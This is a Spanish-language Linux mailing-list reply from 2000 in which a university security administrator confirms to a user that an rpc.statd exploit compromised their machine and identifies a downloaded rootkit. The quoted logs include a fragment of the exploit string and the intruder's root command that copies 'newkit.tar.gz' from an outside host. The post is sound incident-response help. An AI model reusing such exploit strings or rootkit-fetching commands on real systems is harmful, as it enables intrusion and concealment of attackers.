Hack

Gunnar Wolf gwolf en campus.iztacala.unam.mx
Lun Sep 4 13:17:51 CDT 2000


> 
> Que tal amigos, checando mis log me encontre con esto
> (...)
> Sep  2 14:01:12 micompu rpc.statd[419]: gethostbyname error for
> ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^
> Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿bffff750 8049710
> 8054da0687465676274736f6d616e7972652065
> 20726f7220726f66

Se descubrio hace poco una vulnerabilidad enorme justo en el rpc.statd... 

> (...)
> 
> y se que hicieron esto con la cuenta de root:
> (...)
> rcp root en 128.95.73.225:newkit.tar.gz .;
>
> Alguie sabe que significa, en verdad hackearon mi computadora?

Sin lugar a dudas. newkit.tar.gz es seguramente un rootkit - un juego re
archivos formado para ocultar la presencia de un atacante en tu sistema.

Puede servirte el saber que 128.95.73.225 es horus.wtc.washington.edu, una
computadora que corre algun tipo de Unix, y tiene una barbaridad de
puertos abiertos. Eso puede indicar que su administrador no es muy bueno,
y que, siendo probablemente una computadora utilizada por los alumnos de
la Universidad de Washington, el administrador te agradecera que reportes
quien se esta portando mal en su sistema, y posiblemente que le eches una
mano para cerrar sus agujeros.

Saludos,

-------------------------------------------------------------------
           Gunnar Wolf    gwolf en campus.iztacala.unam.mx
     Universidad Nacional Autónoma de México, Campus Iztacala
   Jefatura de Sección de Desarrollo y Admon. de Sistemas en Red
        Area de Seguridad en Computo - DCI - DGSCA - UNAM
-------------------------------------------------------------------
  Beginner thinks 1Kb == 1000 bytes.   Master knows 1Km == 1024m

---------------------------------------------------------
para salir de la lista, enviar un mensaje con las palabras
"unsubscribe ayuda" en el cuerpo a majordomo en linux.org.mx



Más información sobre la lista de distribución Ayuda